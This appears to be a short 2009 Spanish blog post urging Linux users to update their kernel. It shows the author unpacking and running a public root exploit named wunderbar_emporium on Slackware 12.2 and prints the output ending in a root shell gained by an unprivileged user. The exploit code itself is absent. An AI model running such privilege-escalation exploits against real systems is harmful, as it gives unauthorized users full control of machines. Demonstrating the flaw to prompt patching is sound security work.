Google+

miércoles, 26 de agosto de 2009

Actuliza tu kernel, cualquiera puede ser root


Recientemente salio un bug en el kernel de linux que podría alguien entrar al sistema con permisos de root, bien pues he probado este fallo con una Slackware 12.2 con el kernel: 2.6.27.7 y lo revienta en 3 segundos más o menos.

Esto quiero que quede claro que es con fines educativos. El software lo encontre con el nombre wunderbar_emporium. Los pasos como siempre descomprimimos:
#tar xvf wunderbar_emporium.tgz

Y ejecutamos el .sh
# ./wunderbar_emporium.sh
[+] MAPPED ZERO PAGE!
[+] got ring0!
[+] detected 2.6 style 8k stacks
sh: mplayer: command not found
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
sh-3.1#

La gracia de esto es que lo proveis siendo un usuario sin privilegios.